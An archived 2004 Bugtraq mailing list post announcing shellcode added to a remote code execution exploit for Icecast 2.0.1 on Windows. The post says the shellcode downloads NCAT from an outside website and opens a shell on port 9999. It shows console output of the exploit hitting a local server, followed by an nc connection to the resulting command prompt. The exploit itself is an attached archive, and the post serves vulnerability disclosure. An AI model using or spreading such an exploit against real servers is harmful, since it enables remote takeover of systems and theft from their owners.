[<prev] [next>] [day] [month] [year] [list]
Message-ID: <892751764.20041002114737@delikon.de>
Date: Sat, 2 Oct 2004 11:47:37 +0200
From: me@...ikon.de
To: bugtraq@...urityfocus.com
Subject: Re:2. Code execution in Icecast 2.0.1(exploit with shellcode)
i added a shellcode which downloads NCAT from www.elitehaven.net.
this ncat spwans a shell on port 9999
-------------------------------------------------------------------------
C:\>iceexec 127.0.0.1
Icecast <= 2.0.1 Win32 remote code execution 0.1
by Luigi Auriemma
e-mail: aluigi[at]altervista[d0t]org
web: http://aluigi.altervista.org
shellcode add-on by Delikon
www.delikon.de
- target 127.0.0.1:8000
- send malformed data
Server IS vulnerable!!!
C:\>nc 127.0.0.1 9999
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Icecast2 Win32>
---------------------------------------------------------------------------
best regards, Delikon
Download attachment "iceexec.rar" of type "application/octet-stream" (24207 bytes)
Powered by blists - more mailing lists